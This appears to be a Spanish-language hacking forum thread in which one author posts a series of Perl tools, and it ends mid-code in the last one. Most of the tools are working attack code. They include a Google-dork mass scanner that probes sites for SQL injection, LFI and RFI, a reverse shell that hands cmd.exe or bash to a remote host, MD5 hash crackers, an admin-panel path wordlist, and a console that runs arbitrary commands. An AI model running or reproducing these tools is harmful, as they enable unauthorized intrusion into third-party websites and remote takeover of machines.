[Status] : Finish



(C) Doddy Hackman 2010



Codigo

Código (perl) [Seleccionar] Expandir



#!usr/bin/perl
#Paranoic Scan 0.4
#(c)0ded by Doddy H 2010

use LWP::UserAgent;
use HTTP::Request::Common;
use URI::Split qw(uri_split);

my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");





sub head {
system 'cls';
print qq(


@@@@@   @   @@@@     @   @@  @@@  @@@   @@@  @@@@     @@@   @@@@    @   @@  @@@
@  @   @    @  @    @    @@  @  @   @   @  @   @    @  @  @   @    @    @@  @
@  @  @ @   @  @   @ @   @@  @ @     @  @ @         @    @        @ @   @@  @
@@@   @ @   @@@    @ @   @ @ @ @     @  @ @          @@  @        @ @   @ @ @
@    @@@@@  @ @   @@@@@  @ @ @ @     @  @ @            @ @       @@@@@  @ @ @
@    @   @  @  @  @   @  @  @@  @   @   @  @   @    @  @  @   @  @   @  @  @@
@@@  @@@ @@@@@@  @@@@ @@@@@@  @   @@@   @@@  @@@     @@@    @@@  @@@ @@@@@@  @




);
}
&menu;
sub menu {
&head;
print "[a] : Scan a File\n";
print "[b] : Search in google and scan the webs\n\n";
print "[option] : ";
chomp(my $op = <STDIN>);
if ($op=~/a/ig) {
print "\n[+] Wordlist : ";
chomp(my $word = <STDIN>);
@paginas = repes(savewords($word));
my $option = &men;
scan($option,@paginas);
}
elsif ($op=~/b/ig) {
print "\n[+] Dork : ";
chomp(my $dork = <STDIN>);
print "[+] Pages : ";
chomp(my $pag = <STDIN>);
my $option = &men;
@paginas = &google("www.google.com.ar",$dork,$pag);
scan($option,@paginas);
}
else {
&menu;
}
}
sub scan {
my ($option,@webs) = @_;
print "\n[Status] : Scanning\n";
print "[Webs Count] : ".int(@webs)."\n\n";
for(@webs) {
if ($option=~/S/ig) {
&sql($_);
}
if ($option=~/L/ig) {
&lfi($_);
}
if ($option=~/R/ig) {
&rfi($_);
}
if ($option=~/F/ig) {
&fsd($_);
}
if ($option=~/A/ig) {
&sql($_);
&lfi($_);
&rfi($_);
&fsd($_)
}
}
}
print "\n[Status] : Finish\n";
&finish;


sub toma {
return $nave->request (GET $_[0])->content;
}


sub savefile {
open (SAVE,">>logs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE;
}

sub finish {
print "\n\n\n(C) Doddy Hackman 2010\n\n";
<STDIN>;
exit(1);
}


sub google {
print "\n[Google] : $_[0]\n[Dork] : $_[1]\n[Pages] : $_[2]\n\n[+] Searching pages..\n";
for ($pages=0;$pages<=$_[2];$pages=$pages+10) {
$response = toma("http://$_[0]/search?hl=&q=$_[1]&start=$pages");
while ($response=~m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
push(@founds,$1);
}}
print "[+] Cleaning results\n";
for(@founds) {
$t = clean($_);
push(@r,$t);
}
return(repes(@r));
}


sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
savefile("sql-logs.txt",$page);
}}

sub rfi {
my $page = shift;
$code1 = toma($page."http:/www.supertangas.com/");
if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDD
print "[+] RFI : $page\a\n";
savefile("rfi-logs.txt",$page);
}}

sub lfi {
my $page = shift;
$code1 = toma($page."'");
if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
print "[+] LFI : $page\a\n";
savefile("lfi-logs.txt",$page);
}}


sub fsd {
my $page = shift;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) {
my $me = $1;
$code1 = toma($page.$me);
if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
print "[+] Full Source Discloure : $page\a\n";
savefile("fpd-logs.txt",$page);
}}}

sub repes {
foreach my $palabra ( @_ ) {
next if $repety{ $palabra }++;
push @revisado,$palabra;
}
return @revisado;
}

sub savewords {
open (FILE,$_[0]);
@words = <FILE>;
close FILE;
for(@words) {
$t = clean($_);
push(@r,$t);
}
return(@r);
}

sub men {
print "\n\n[+] Scan Type : \n\n";
print "[S] : SQL\n";
print "[L] : LFI\n";
print "[R] : RFI\n";
print "[F] : Full Source Discloure\n";
print "[A] : All\n\n";
print "\n[Option] : ";
chomp(my $option = <STDIN>);
return $option;
}

sub clean {
if ($_[0] =~/\=/) {
my @sacar= split("=",$_[0]);
return(@sacar[0]."=");
}
}

#The End
#Contact : doddy-hackman[at]hotmail[com]
#blog : doddy-hackman.blogspot.com

Hola , aca les dejo un simple programa para buscar la decodificacion de un hash md5

Código (perl) [Seleccionar] Expandir

#!usr/bin/perl
#Pass Cracker 1.0
#(C) Doddy Hackman 2011

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
unless($ARGV[0]) {
print "\n\n[+] sintax : $0 <hash>\n\n";
} else {
crackit($ARGV[0]);
}
copyright();

sub crackit {

print "\n[+] Cracking $_[0]\n\n";

my %hash = (
 
'http://passcracking.com/' => {
'tipo'  => 'post',
'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}',
'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
},  
'http://md5.hashcracking.com/search.php?md5=' =>  {
'tipo' => 'get',
'regex' => 'Cleartext of $_[0] is (.*)',
},
'http://www.bigtrapeze.com/md5/' =>  {
'tipo' => 'post',
'variables'=>'{"query" => $_[0], "submit" => " Crack "}',
'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
},
'http://opencrack.hashkiller.com/' =>  {
'tipo' => 'post',
'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>),
},
'http://www.hashchecker.com/index.php?_sls=search_hash' =>  {
'tipo' => 'post',
'variables'=>'{"search_field" => $_[0], "Submit" => "search"}',
'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
},
'http://victorov.su/md5/?md5e=&md5d=' =>  {
'tipo' => 'get',
'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
}
);

for my $data(keys %hash) {

if ($hash{$data}{tipo} eq "get") {
$code = toma($data.$_[0]);
if ($code=~/$hash{$data}{regex}/ig) {
print "\n[+] Decoded : ".$1."\n\n";
}
} else {
$code = tomar($data,$hash{$data}{variables});
if ($code=~/$hash{$data}{regex}/ig) {
print "\n[+] Decoded : ".$1."\n\n";
}
}
}
print "\n[+] Finish\n";
}

sub head {
print "\n\n-- == Pass Cracker == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0])->content;
}

sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?

Ejemplo de uso

Código [Seleccionar] Expandir


perl crack.pl <hash>


Bueno aca eh terminado un programa que los ayudara a publicar sus programas
en pastebin de una forma rapida y sin ganas xDDD

Entonces , este programa tiene dos opciones :

• Publica solo un archivo
  
• Publica todos los archivos en un directorio
  
  Tambien detecta el tipo de extension para poder publicar el codigo en su respectivo tipo de codigo
  
  
  Código (perl) [Seleccionar] Expandir
  #!usr/bin/perl
#Paste Bin Uploader (C) Doddy Hackman 2011

use LWP::UserAgent;
use HTTP::Request::Common;

my $nave = LWP::UserAgent->new();
$nave->timeout(10);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

menu();

sub menu {

clean();
header();

print "\n\n[Options]\n\n";
print "[1] : Upload a file\n";
print "[2] : Upload a directory\n";
print "[3] : Exit\n\n";
print "[Option] : ";
chomp(my $op = <stdin>);

if ($op eq 1) {
print "\n\n[File] : ";
chomp(my $file = <stdin>);

if (-f $file)  {

($name,$exta) =verfile($file);

my $ext = extensiones($exta);

if ($ext ne "Yet") {


$code = openfile($file);

$re = lleva($name,$code,$ext);

print "\n\n[+] File : $file\n";
print "[+] Link : ".$re."\n";

savefile("uploads_paste.txt","\n[+] File : $file");
savefile("uploads_paste.txt","[+] Link : ".$re);

}


} else {
print "\n\n[-] Error\n\n";
}
reload();
}

elsif ($op eq 2) {

print "\n\n[Directory] : ";
chomp(my $dir = <stdin>);

if (-d $dir) {

my @files = verdir($dir);

print "\n\n[+] Loading directory\n";

for my $file(@files) {

chomp $file;

my ($name,$exta) =verfile($file);

my $ext = extensiones($exta);

if ($ext ne "Yet") {

my $code = openfile($dir."/".$file);

$re = lleva($name,$code,$ext);

print "\n\n[+] File : $file\n";
print "[+] Link : ".$re."\n";

savefile("uploads_paste.txt","\n[+] File : $file");
savefile("uploads_paste.txt","[+] Link : ".$re);

}
}
} else {
print "\n\n[-] Error\n\n";
}

reload();
}

elsif ($op eq 3) {
copyright();
<stdin>;
exit(1);
}

else {
menu();
}
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
}

sub header {

print q(

PPPP     AA     SSSSTTTTTTEEEE    BBBB   II NN   NN     UU  UU  PPPP
PP PP    AA    SS  S  TT  EE      BB BB  II NNN  NN     UU  UU  PP PP
PP PP   AAAA   SS     TT  EE      BB BB  II NNNN NN     UU  UU  PP PP
PPPP    A  A    SSS   TT  EEEE    BBBB   II NN N NN     UU  UU  PPPP
PP     AAAAAA     SS  TT  EE      BB BB  II NN NNNN     UU  UU  PP  
PP     AA  AA  S  SS  TT  EE      BB BB  II NN  NNN     UUUUUU  PP  
PP     AA  AA  SSSS   TT  EEEE    BBBB   II NN   NN      UUUU   PP  


);

}

sub clean {
system("cls");
}



sub verdir{
my @archivos;
opendir DIR,$_[0];
my @archivos = readdir DIR;
for (@archivos) {
if (-f $_[0]."/".$_) {
push(@files,$_)
}
}
return @files;
}

sub verfile {
if ($_[0]=~/(.*)\.(.*)/ig) {
return ($1,$2);
}
}

sub extensiones {

if ($_[0] =~/py/ig) {
$code  = "python";
}
elsif ($_[0] =~/pl/ig) {
$code = "perl";
}
elsif ($_[0] =~/rb/ig) {
$code = "ruby";
}
elsif ($_[0] =~/php/ig) {
$code = "php";
}
elsif ($_[0] =~/txt/ig) {
$code = "";
}
else {
$code = "Yet";
}
return $code;
}

sub reload {
print "\n\n[?] Enter for continue\n\n";
<stdin>;
menu();
}



sub savefile {
open (SAVE,">>logs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE;
}

sub openfile {

my $r;

open (FILE,$_[0]);
@wor = <FILE>;
close FILE;
for(@wor) {
$r.= $_;
}
return $r;
}

sub lleva {
return $nave->post('http://pastebin.com/api_public.php',{ paste_code => $_[1],paste_name=> $_[0],paste_format=>$_[2],paste_expire_date=>'N',paste_private=>"public",submit=>'submit'})->content;
}

# ¿ The End ?


 Hola a todos.

Hoy traigo un simple reverse shell en esta version solo pueden conectarse al server que tiene netcat
despues ofrece informacion depende del sistema operativo que tiene el que ejecuto el script.
En la version 0.2 le agregare deteccion de kernel y su posible exploit.

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#Reverse Shell 0.1
#By Doddy H

use IO::Socket;

print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";

unless (@ARGV == 2) {
print "[Sintax] : $0 <host> <port>\n\n";
exit(1);
} else {
print "[+] Starting the connection\n";
print "[+] Enter in the system\n";
print "[+] Enjoy !!!\n\n";
conectar($ARGV[0],$ARGV[1]);
tipo();
}

sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root();  
system("bin/bash");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
}

#The End



Un simple scanner de SQLI para usar en google

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#Search Google for scan SQLI
#(C) Doddy Hackman 2011

use LWP::UserAgent;
use HTML::LinkExtor;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();

print "\n\n[Dork] : ";
chomp(my $dork = <stdin>);
print "\n\n[Pages] : ";
chomp(my $pages = <stdin>);
print "\n\n[Starting the search]\n\n";
my @links = google($dork,$pages);
print "\n[Links Found] : ".int(@links)."\n\n\n";
print "[Starting the scan]\n\n\n";
for my $link(@links) {
if ($link=~/(.*)=/ig) {
my $web = $1;
sql($web."=");
}}
print "\n\n[+] Finish\n";
copyright();
<stdin>;

sub google {
my($a,$b) = @_;
for ($pages=10;$pages<=$b;$pages=$pages+10) {
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
push(@url,$l);
}
}
}

for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}

my @founds = repes(@founds);

return @founds;
}


sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
}}

sub get_links {

$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;

sub agarrar {
my ($a,%b) = @_;
push(@links,values %b);
}
}

sub repes {
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}

sub head {
print "\n\n-- == Search Google == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0])->content;
}

sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?

HOla a todos  aca les traigo un simple scanner de puertos
hecho en perl

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#Scan Port
#(C) Doddy Hackman 2011
#Creditos

use IO::Socket;

head();
unless($ARGV[0]) {
print "\n\n[sintax] : ".$0." <ip> \n\n";
} else {
scan($ARGV[0]);
}
copyright();

sub scan {

my %ports = ("21"=>"ftp",
"22"=>"ssh",
"25"=>"smtp",
"80"=>"http",
"110"=>"pop3",
"3306"=>"mysql"
);


print "\n[+] Scanning $_[0]\n\n\n";

for my $port(keys %ports) {

if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
}
}

}

sub head {
print "\n\n-- == Scan Port == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}



Ejemplo de uso

Código [Seleccionar] Expandir


perl scan.pl localhost


Hola a todos

HOy acabo de hacer un crackeador de hash md5 con salto o sin el
En esta version es con ventanas usandos tk

Código (perl) [Seleccionar] Expandir

#Search MD5
#Version : Tk
#Author : Doddy Hackman


use Tk;
use Digest::MD5;
use Tk::FileSelect;
use Tk::ROText;

if ($^O eq 'MSWin32') {
use Win32::Console;
Win32::Console::Free();
}

my $w = MainWindow->new(-background=>"black");
$w->title("Search MD5");
$w->geometry("500x200+20+20");
$w->resizable(0,0);
$w->Label(-text=>"Search MD5",-background=>"black",-foreground=>"cyan",-font=>"Impact")->pack();
$w->Label(-text=>"Hash",-background=>"black",-foreground=>"green")->place(-x =>40, -y => 55);
my $hash = $w->Entry(-text=>"30d554c3665c8f204622b2003c77d994",-background=>"black",-foreground=>"green")->place(-x =>90, -y => 55);
$w->Label(-text=>"Salt",-background=>"black",-foreground=>"green")->place(-x =>260, -y => 55);
my $salt = $w->Entry(-text=>"X",-background=>"black",-foreground=>"green")->place(-x =>290, -y => 55);
$w->Label(-text=>"Wordlist",-background=>"black",-foreground=>"green")->place(-x =>40, -y => 100);
my $o = $w->Entry(-textvariable=>\$file,-background=>"black",-foreground=>"green")->place(-x =>90, -y => 100);
$w->Button(-text=>"Browse",-background=>"black",-foreground=>"red",-activebackground=>"red",-command=>\&oper)->place(-x =>230, -y => 100);
$w->Button(-text=>"Crack!",-foreground=>"green",-background=>"black",-command=>\&crack,-activebackground=>"green")->place(-x =>180, -y => 160);
$w->Button(-text=>"About",-foreground=>"green",-background=>"black",-command=>\&about,-activebackground=>"green")->place(-x =>240, -y => 160);
$w->Button(-text=>"Exit",-foreground=>"green",-background=>"black",-command=>[$w =>'destroy'],-activebackground=>"green")->place(-x =>300, -y => 160);

sub oper{
$w->update;
$browse = $w->FileSelect(-directory => "/");
my $file = $browse->Show;
$o->configure (-text =>$file);
}

sub about {
my $venta = MainWindow->new(-background=>"black");
$venta->geometry("300x180+20+20");
$venta->title("About");
$venta->resizable(0,0);
$venta->Label(-text=>"\nSearch MD5\n\n\nProgrammer : Doddy Hackman\n\nContact : lepuke[at]hotmail[com]\n\n",-background=>"black",-foreground=>"yellow")->pack();
$venta->Button(-text=>"Exit",-foreground=>"yellow",-background=>"black",-command => [$venta => 'destroy'],-activebackground=>'yellow')->pack()
}

sub crack {
my $hash = $hash->get;
my $salt = $salt->get;
my $wordlist = $o->get;

my $console = MainWindow->new(-background=>"black");
$console->title("Status");
$console->resizable(0,0);
$console->geometry("400x320+20+20");
$console->Label(-text=>"Status",-background=>"black",-foreground=>"green",-font=>"Impact")->pack();
my $box = $console->ROText(-background=>"black",-foreground=>"green",-width=> 45,-height=> 15)->place(-x =>40,-y=>50);
$console->Button(-text=>"Exit",-background=>"black",-foreground=>"green",-activebackground=>"green",-command=> [$console => 'destroy'],-width=>"20")->place(-x =>130, -y => 280);
if ($salt eq "X") { $salt = "";}
unless (-f $wordlist) { $box->insert('end',"\n\n[-] Wordlist dont exist!\n\n");next;}
if(length($hash)==32) {
$box->insert('end',"[Hash] : $hash\n[Salt] : $salt\n[Wordlist] : $wordlist\n\n");
open word,$wordlist;
@words = <word>;
close word;
for my $pass(@words) {
chomp $pass;
$console->update;
$box->insert('end',"[+] Trying with $pass\n");
$digest = Digest::MD5->md5_hex($pass.$salt);chomp $digest;
if ($digest == $hash) {print "\a\a";$box->insert('end',"\n[Hash encoded] : $hash\n[Hash decoded] : $pass\n\n");$ok="1";last;}
}} else { $box->insert('end',"\n\n[-] The hash is incorrect\n\n");next;}
unless ($ok eq "1") {$box->insert('end',"\n\n[-] Sorry , hash not cracked\n\n");next;}}

MainLoop;



Bueno aca les traigo un programa que eh estado
haciendo esta ultima semana

Se llama stalker , sirve como consola en caso de que cmd.exe no este
disponible y tiene las siguiente funciones

• Mostrar IP de servidor especifico
  
• Capturar todos los links de una pagina
  
• Recibir procesos de nuestra maquina
  
• Cerrar el proceso que nos moleste
  
• Conectar a un servidor y mostrar respuesta
  
• Capturar metodos HTTP de un servidor web
  
• Verificar listado de directorios en una pagina
  
• Codificacion y decodificacion de hex/ascii/base64
  
• Escanear puertos de una IP
  
• Buscar panel de administracion
  
• Crackear hash md5 mediante webs
  
• Buscar en google paginas vulnerables a SQLI
  
• Cliente FTP
  
• Navegador por nuestros archivos y directorios
  
• Y ejecutar comandos
  
  
  
  Código (perl) [Seleccionar] Expandir
  #!usr/bin/perl
#Project STALKER (C) Doddy Hackman 2011
#
#ppm install http://www.bribes.org/perl/ppm/DBI.ppd
#ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
#
#You need download this http://search.cpan.org/~animator/Color-Output-1.05/Output.pm
#

use IO::Socket;
use HTML::LinkExtor;
use LWP::UserAgent;
use Win32::OLE qw(in);
use Win32::Process;
use Net::FTP;
use Cwd;
use URI::Split qw(uri_split);
use MIME::Base64;
use DBI;
use Color::Output;
Color::Output::Init

@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
,'administration/','administration/index.php','administration/login.php'
,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
,'system/login.php','admin.php','login.php','administrador.php','administration.php'
,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
,'administrator/','administrator/index.html','administrator/login.html'
,'administrator/account.html','administrator/account.php','administrator.html','login.html'
,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
,'administrator/login.asp','administrator/account.asp','administrator.asp'
,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
,'server/','database_administration/','power_user/','system_administration/'
,'ss_vms_admin_sm/');


unless (-d "/logs/webs") {
mkdir("logs/",777);
mkdir("logs/webs/",777);
}

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();

getinfo();

$SIG{INT} = \&next;

while(1) {
cprint "\x037"; #13
menujo();
cprint "\x030";
}

sub getinfo {
$so = $^O;
$login = Win32::LoginName();
$domain = Win32::DomainName();
cprint "\x0313"; #13
print "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n";
cprint "\x030";
}


sub menujo {
print "\n\n>";
chomp (my $cmd = <stdin>);
print "\n\n";

if ($cmd=~/getinfo/ig) {
getinfo();
}
elsif ($cmd =~/getip (.*)/) {
my $te = $1;
if ($te eq "" or $te eq " ") {
print "\n[+] sintax : getip <host>\n";
}
print "\n[IP] : ".getip($1)."\n";
print "\n";
}

elsif ($cmd =~/getlink (.*)/) {
print "[+] Extracting links in the page\n\n\n";
$code = toma($1);
my @re = get_links($code);
for my $url(@re) {
chomp $url;
print "[Link] : $url\n";
}
print "\n\n[+] Finish\n";
}

elsif ($cmd=~/help/) {
helpme();
}

elsif ($cmd=~/getprocess/) {
my %re = getprocess();


for my $data(keys %re) {
($proceso,$pid) = ($t=~/(.*):(.*)/ig);
print "[+] Proceso : ".$data."\n";
print "[+] PID : ".$re{$data}."\n\n";
}
}
elsif ($cmd=~/killprocess (.*) (.*)/) {
if (killprocess($1,$2)) {
print "[+] Process $1 closed";
}
}
elsif ($cmd=~/conec (.*) (.*) (.*)/) {
print conectar($1,$2,$3);
}
elsif ($cmd=~/allow (.*)/) {
$re = conectar($1,"80","GET / HTTP/1.0\r\n");
if ($re=~/Allow:(.*)/ig) {
print "[+] Metodos : ".$1."\n";
}}
elsif ($cmd=~/paths (.*)/) {
scanpaths($1);
}
elsif ($cmd=~/encodehex (.*)/) {
print "\n\n[+] ".hex_en($1)."\n\n";
}
elsif ($cmd=~/decodehex (.*)/) {
print "\n\n[+] ".hex_de($1)."\n\n";
}
elsif ($cmd=~/download (.*) (.*)/) {
my $file,$name = $1,$2;
if (download($1,$2)) {
print "[+] File downloaded\n";
}
}
elsif ($cmd=~/encodeascii (.*)/) {
print "\n\n[+] ".ascii($1)."\n\n";
}
elsif ($cmd=~/decodeascii (.*)/) {
print "\n\n[+] ".ascii_de($1)."\n\n";
}
elsif ($cmd=~/encodebase (.*)/) {
print "\n\n[+] ".base($1)."\n\n";
}
elsif ($cmd=~/decodebase (.*)/) {
print "\n\n[+] ".base_de($1)."\n\n";
}
elsif ($cmd=~/aboutme/) {
aboutme();
}
elsif ($cmd=~/scanport (.*)/) {
scanport($1);
}
elsif ($cmd=~/panel (.*)/) {
scanpanel($1);
}
elsif ($cmd=~/scangoogle/) {
print "[Dork] : ";
chomp(my $dork = <stdin>);
print "\n\n[Pages] : ";
chomp(my $pages = <stdin>);
print "\n\n[Starting the search]\n\n";
my @links = google($dork,$pages);
print "\n[Links Found] : ".int(@links)."\n\n\n";
print "[Starting the scan]\n\n\n";
for my $link(@links) {
if ($link=~/(.*)=/ig) {
my $web = $1;
sql($web."=");
}}
print "\n\n[+] Finish\n";
}
elsif ($cmd=~/getpass (.*)/) {
crackit($1);
}
elsif ($cmd=~/ftp (.*) (.*) (.*)/) {
ftp($1,$2,$3);
}
elsif ($cmd=~/navegator/) {
nave:
print getcwd().">";
chomp(my $rta = <stdin>);
print "\n\n";
if ($rta=~/list/) {
my @files = coleccionar(getcwd());
for(@files) {
if (-f $_) {
print "[File] : ".$_."\n";
} else {
print "[Directory] : ".$_."\n";
}}}
if ($rta=~/cd (.*)/) {
my $dir = $1;
if (chdir($dir)) {
print "\n[+] Directory changed\n";
} else {
print "\n[-] Error\n";
}}
if ($rta=~/del (.*)/) {
my $file = getcwd()."/".$1;
if (-f $file) {
if (unlink($file)) {
print "\n[+] File Deleted\n";
} else {
print "\n[-] Error\n";
}
} else {
if (rmdir($file)) {
print "\n[+] Directory Deleted\n";
} else {
print "\n[-] Error\n";
}}}
if ($rta=~/rename (.*) (.*)/) {
if (rename(getcwd()."/".$1,getcwd()."/".$2)) {
print "\n[+] File Changed\n";
} else {
print "\n[-] Error\n";
}}
if ($rta=~/open (.*)/) {
my $file = $1;
chomp $file;
system($file);
#system(getcwd()."/".$file);
}
if ($rta=~/help/) {
print "\nCommands : help cd list del rename open exit\n\n";
}
if ($rta=~/exit/) {
next;
}
print "\n\n";
goto nave;
}
elsif ($cmd=~/kobra (.*)/) {
my $url = $1;
chomp $url;
scansqli($url,"--");
}
elsif ($cmd=~/mysql (.*) (.*) (.*)/) {
enter($1,$2,$3);
}
elsif ($cmd=~/exit/) {
copyright();
<stdin>;
exit(1);
}
else {
system($cmd);
}
#print "\n\n";
}


sub scansqli {
print "[Status] : Scanning.....\n";
$pass = &bypass($_[1]);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
if ($_[0]=~/hackman/ig) {
savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
&menu_options($_[0],$pass,$save);
}
my ($gen,$save,$control) = &length($_[0],$_[1]);
if ($control eq 1) {
print "[Status] : Enjoy the menu\n\n";
&menu_options($gen,$pass,$save);
} else {
